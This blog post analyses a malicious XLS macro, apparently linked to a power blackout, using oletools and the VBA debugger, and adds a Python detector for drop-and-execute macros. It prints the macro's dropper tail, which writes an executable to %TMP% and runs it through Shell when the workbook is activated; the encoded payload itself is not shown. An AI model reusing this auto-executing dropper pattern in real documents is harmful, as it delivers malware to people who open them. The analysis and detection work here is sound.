The full intrusion chain, and how the malware was related to the blackout, is not yet clear.
(See RobertMLee's tweets: https://twitter.com/RobertMLee/status/685030648587812864 and https://twitter.com/RobertMLee/status/685031160901074944)
However, it looks like an MS Office XLS document was involved or was somehow related.
I got a sample of the file and, to perform the analysis, followed an approach similar to the one in a post I wrote some days ago:
Using REMnux v6, I check the content of the file with oletools:
I dump the macro to a temporary file:
There are several encoded subroutines, but the part that matters for getting the EXE is the final part of the code. I can see that an executable file is created and then executed through the 'Shell' instruction:
..
Private Sub MacroExpl()
    Dim fnum As Integer
    Dim fname As String
    Dim i As Integer
    Dim j As Integer
    Dim aa As Byte
    ' Init0..Init25 are the encoded subroutines that populate the array a(i)(j)
    Init0
    Init1
    Init2
    Init3
    Init4
    Init5
    Init6
    Init7
    Init8
    Init9
    Init10
    Init11
    Init12
    Init13
    Init14
    Init15
    Init16
    Init17
    Init18
    Init19
    Init20
    Init21
    Init22
    Init23
    Init24
    Init25
    fnum = FreeFile
    ' The dropped executable is written to %TMP%\vba_macro.exe
    fname = Environ("TMP") & "\vba_macro.exe"
    Open fname For Binary As #fnum
    ' 768 x 128 = 98304 bytes, written one byte at a time
    For i = 1 To 768
        For j = 0 To 127
            aa = a(i)(j)
            Put #fnum, , aa
        Next j
    Next i
    Close #fnum
    Dim rss
    ' Run the dropped file (window style 1 = normal window with focus)
    rss = Shell(fname, 1)
End Sub

' Entry point: runs automatically when the workbook is activated
Private Sub Workbook_Activate()
    MacroExpl
End Sub
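The drop-and-execute pattern in the macro above (write bytes to a file under %TMP%, then pass the same path to Shell) can be triaged statically from the dumped VBA text, without opening the document in Office. The following Python is an added example and not code from the original post: it embeds the post's macro trimmed to its final part, looks for an Open ... For Binary / Put / Shell chain on the same variable plus an auto-exec entry point, and reports the resolved drop path.

```python
import re

# Macro dumped in the post, trimmed to its drop-and-execute tail (Init0..Init25 omitted).
MACRO = r'''
Private Sub MacroExpl()
    Dim fnum As Integer
    Dim fname As String
    fnum = FreeFile
    fname = Environ("TMP") & "\vba_macro.exe"
    Open fname For Binary As #fnum
    For i = 1 To 768
        For j = 0 To 127
            aa = a(i)(j)
            Put #fnum, , aa
        Next j
    Next i
    Close #fnum
    rss = Shell(fname, 1)
End Sub
Private Sub Workbook_Activate()
    MacroExpl
End Sub
'''

# Procedure names that Office runs without any user interaction
AUTO_EXEC = ("Workbook_Open", "Workbook_Activate", "Auto_Open", "AutoOpen", "Document_Open")

def resolve_path(expr):
    # Rewrite  Environ("TMP") & "\vba_macro.exe"  as  %TMP%\vba_macro.exe  for the report
    expr = re.sub(r'Environ\("([^"]+)"\)', r'%\1%', expr, flags=re.I)
    return "".join(p.strip().strip('"') for p in expr.split("&"))

def find_drop_and_exec(src):
    """Flag a macro that writes a file with Put and then passes the same path to Shell."""
    report = {"is_dropper": False, "path": None, "handle": None, "auto_exec": []}
    opened = re.search(r'\bOpen\s+(\w+)\s+For\s+Binary\s+.*?As\s+#?(\w+)', src, re.I)
    if not opened:
        return report
    path_var, handle = opened.groups()
    report["handle"] = handle
    assign = re.search(r'\b%s\s*=\s*(.+)' % path_var, src, re.I)
    if assign:
        report["path"] = resolve_path(assign.group(1))
    writes = re.search(r'\bPut\s+#?%s\b' % handle, src, re.I)
    execs = re.search(r'\bShell\s*\(\s*%s\b' % path_var, src, re.I)
    report["is_dropper"] = bool(writes and execs)
    report["auto_exec"] = [n for n in AUTO_EXEC if re.search(r'\bSub\s+%s\b' % n, src, re.I)]
    return report
```

Running find_drop_and_exec(MACRO) reports the dropper with path %TMP%\vba_macro.exe and Workbook_Activate as the trigger; the same check applies to any olevba dump.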
The next step is to dump the EXE file. For that, I first try to open the original malicious XLS in the MS Office VBA debugger to set a breakpoint in that function before it is executed.
However, the macro is password protected:
But as I already have the macro dumped in REMnux, I can create my own XLS document and import that macro. So I do that:
Now I set the breakpoint on the 'Shell' call and can see where the executable file is stored before it is executed.
With this I have the executable :)
In future posts I will explain the approach to analysing the EXE file.